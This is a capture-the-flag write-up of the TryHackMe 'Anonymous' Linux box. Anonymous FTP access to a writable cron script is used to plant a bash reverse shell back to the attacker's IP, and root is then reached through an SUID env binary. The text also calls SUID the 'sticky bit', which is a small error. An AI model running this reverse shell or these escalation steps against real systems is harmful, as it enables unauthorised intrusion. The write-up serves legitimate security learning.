Intro

Anonymous is a simple and straightforward Linux box where we’ll take advantage of a misconfigured FTP service to get a shell. From there we’ll escalate our privileges through another misconfiguration, this time through a root-owned binary with SUID permissions.

Recon

rustscan -a 10.10.174.130 -- -sC -sV -oA nmap1

PORT    STATE SERVICE     VERSION                       
21/tcp  open  ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts [NSE: writeable]
| ftp-syst:         
|   STAT:                                                
| FTP server status:                                     
|      Connected to ::ffff:10.6.48.252  
|      Logged in as ftp
|      TYPE: ASCII 
|      No session bandwidth limit         
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable            
|_End of status       
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:                                           
|   256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_  256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
                            
Host script results:                                     
| nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:                                                 
|   ANONYMOUS<00>        Flags: <unique><active>
|   ANONYMOUS<03>        Flags: <unique><active>
|   ANONYMOUS<20>        Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>                                                           
|   WORKGROUP<00>        Flags: <group><active>                                                                    
|   WORKGROUP<1d>        Flags: <unique><active>                                                                   
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery:                                      
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: anonymous 
|   NetBIOS computer name: ANONYMOUS\x00
|   Domain name: \x00
|   FQDN: anonymous
|_  System time: 2021-04-14T12:21:59+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-04-14T12:21:59
|_  start_date: N/A

Enumeration

Nmap detected that the FTP service allows anonymous sessions so let’s start looking around there.

┌──(brian㉿kali)-[~/lab/hacks/tryhackme/Anonymous]
└─$ ftp -v 10.10.6.185 
Connected to 10.10.6.185.
220 NamelessOne's FTP Server!
Name (10.10.6.185:brian): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts
226 Directory send OK.
ftp> cd scripts
250 Directory successfully changed.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xrwx    1 1000     1000          314 Jun 04  2020 clean.sh
-rw-rw-r--    1 1000     1000         1032 Jun 01 00:19 removed_files.log
-rw-r--r--    1 1000     1000           68 May 12  2020 to_do.txt
226 Directory send OK.

We can write to the clean.sh script, and it writes to removed_files.log. It looks like the script may be running as job every minute or two, as the last modified time on the log file keeps incrementing.

Getting Shell + User Flag

Let’s get clean.sh to download it to our local box and add in some shellcode:

/bin/bash -i >& /dev/tcp/10.6.48.252/4444dd 0>&1

Now we can open up a netcat listener with nc -nlvp 4444 and in the FTP window, send clean.sh to transfer the modified script back to the target.

The next time the job runs we’ll catch a shell!

┌──(brian㉿kali)-[~/lab/hacks/tryhackme/Anonymous]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.6.48.252] from (UNKNOWN) [10.10.6.185] 47610
bash: cannot set terminal process group (1458): Inappropriate ioctl for device
bash: no job control in this shell
namelessone@anonymous:~$ id
id
uid=1000(namelessone) gid=1000(namelessone) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

We’ll find the user flag in the user’s home directory.

Privilege Escalation

Let’s search for root SUID binaries to see if there is a quick path to root.

find / -user root -type f -perm /4000 2>/dev/null

We get a long list of files here to enumerate but the one we’re looking for is /usr/bin/env. Since this is owned by root and has the sticky bit set, it won’t drop privileges when we execute it and therefore we can open a root shell.

namelessone@anonymous:~$ env /bin/bash -p -i
env /bin/bash -p -i
bash: cannot set terminal process group (1458): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.4# id
id
uid=1000(namelessone) gid=1000(namelessone) euid=0(root) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
bash-4.4# cd /root && ls -l
cd /root && ls -l
total 4
-rw-r--r-- 1 root root 33 May 11  2020 root.txt
bash-4.4# wc -c root.txt
wc -c root.txt
33 root.txt